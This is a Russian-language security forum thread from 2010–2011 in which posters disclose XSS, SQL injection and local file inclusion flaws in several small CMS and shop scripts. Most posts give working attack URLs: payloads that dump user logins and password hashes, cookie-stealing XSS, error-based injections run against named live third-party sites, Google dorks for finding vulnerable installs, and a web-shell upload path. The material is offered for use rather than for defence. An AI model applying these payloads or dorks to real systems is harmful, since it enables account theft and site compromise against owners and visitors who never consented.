ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

19.11.2010, 14:13
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме: 691279
Репутация:
55
|
|
Дополнение к посту от 547
Ajax OnlineShop 1.0
Xss
офф-демо-сайт
Код:
http://www.ajax-onlineshop.de/demo/index.php?id=1">alert('d0s')
+xss на офф.сайте
Код:
http://www.ajax-onlineshop.de/servicemail/
Заполняем все поля,уязвимое поле - Name
Вбиваем туда что-нибудь типо
[CODE]
">alert(1)
|
|
|

25.11.2010, 17:25
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме: 0
Репутация:
0
|
|
osPHPSite 0.0.1 Beta
http://www.osphpsite.com/
SQL Injection:
/index.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]database_connect[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * from content
WHERE id =[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
...[/COLOR][/COLOR]
Пример:
Код:
http://php/index.php?id=25%20union%20select%201,concat_ws(0x3a,id,username,password),3,4,5,6,7,8 from user--
Необходимы права администратора. Путь:
Код:
http://php/admin/index.php?page[]=config
Многие места так же уязвимы к SQL inj. Скрипт полностью бажный.
|
|
|

25.11.2010, 18:40
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме: 0
Репутация:
0
|
|
NinkoBB v. 1.3
http://ninkobb.com/
XSS:
Создаем новый топик, по адресу message.php с "Subject" и "Message" содержанием:
И пока топик висит на главной странице имеем активную XSS.
[/B]
|
|
|

27.11.2010, 03:29
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме: 691279
Репутация:
55
|
|
KAPCMS v0.904
http://kapcms.ru/
XSS
Вписываем в поле поиска пишем:
Гет запрос будет выглядить следующем образом:
Код:
http://kapcms.ru/?s=alert(1)&page=11
[/B]
|
|
|

28.11.2010, 15:34
|
|
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме: 4855
Репутация:
0
|
|
Creativestate
Тип уязвимости: SQL inj
http://www.creativestate.com/work
dork:Site design by Creative State
админка:localhost/admin/
пример:/index.cfm?id=-2%20union%20select%201,2,3,4,5,6,7,8,group_concat( managerLogin,0x3a,managerPassword)%20from%20manage rs%20--
|
|
|

11.12.2010, 22:12
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме: 691279
Репутация:
55
|
|
Web@all CMS
http://webatall.com/
XSS
Вписываем в поле поиска (сразу под формой входа в правом верхнем углу,если кто ненашел):
Код:
alert(document.cookie)
|
|
|

20.12.2010, 15:15
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме: 691279
Репутация:
55
|
|
Дополнение к посту Root-access
CompactCMS
офф сайт: compactcms.nl
XSS
content/403.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
Пример:
Код:
http://demo.compactcms.nl/content/403.php?page=alert(document.cookie)
Тоже самое в файле 404.php по соседству.
|
|
|

10.01.2011, 18:27
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме: 691279
Репутация:
55
|
|
xzengine 1.7 beta 8
Офф сайт xzengine.ru
DORK : "Powered by xzengine"
SQL injection
Крутим через ошибку,пример на нескольких сайтах:
Код:
http://xzengine.ru/index.php?category=1+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+
http://glassofvine.ru/index.php?category=1+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+
http://hightvoltage.net/index.php?category=1+and+ExtractValue(1,concat(0x5c,(select+version())))--+
XSS
Пример:
Код:
http://xzengine.ru/index.php?category=1-->alert(1)
Заливка шелла,нужны права админа
В админке "загрузить файл",льем наш шелл и он будет по адресу site.com/upload/shell.php
//если есть возможность(двиг не платный) то показывайте уязвимый код. (Konqi)
Фараон
Не совсем так,даже если ты закоментируешь обращение к бд ето,то инъекция будет,т.к. там еще 2 обращение к бд с этой переменной.И зачем ты копировал мой пост?
|
|
|

10.01.2011, 20:08
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме: 0
Репутация:
0
|
|
Дополнение к посту ~d0s~(#444):
Xzengine 1.7 beta 8
SQL injection:
/index.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
require_once[/COLOR][COLOR="#DD0000"]'./classes/viewnews.php'[/COLOR][COLOR="#007700"];
...
if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"]]))
[/COLOR][COLOR="#0000BB"]$category[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"]];
...
[/COLOR][/COLOR]
/viewnews.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if([/COLOR][COLOR="#0000BB"]$category[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])
{[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]AbstractDataBase[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Instance[/COLOR][COLOR="#007700"]()->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'SELECT * FROM '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]DATABASE_TBLPERFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'news WHERE news_fixed = 0 AND news_approve = 1 AND news_view = 1 ORDER BY news_id DESC LIMIT '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newsperpage[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newsperpage[/COLOR][COLOR="#007700"]);
}
else
{[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]AbstractDataBase[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Instance[/COLOR][COLOR="#007700"]()->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'SELECT * FROM '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]DATABASE_TBLPERFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'news WHERE news_fixed = 0 AND news_approve = 1 AND news_view = 1 AND news_category = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$category[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' ORDER BY news_id DESC LIMIT '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newsperpage[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newsperpage[/COLOR][COLOR="#007700"]);
}
...
[/COLOR][/COLOR]
Пример:
Код:
http://eng/index.php?category=3%20union%20select%20concat_ws(0x3a,users_login,users_password),2,3,4,5,6,7,8,9,10,11,12,13%20from%20xz_users%20limit%200,1--
|
|
|

30.01.2011, 23:06
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме: 691279
Репутация:
55
|
|
Sobak CMS 0_2
Скачате: http://sourceforge.net/projects/sobakcms/
LFI
Need: rg = on ; mq = off
index.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]//...
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$isInWebs[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]) {
include ([/COLOR][COLOR="#DD0000"]'webs/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]//...
[/COLOR][/COLOR]
эксплуатация:
Код:
http://localhost/sobak/index.php?isInWebs=1&id=../robots.txt%00
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|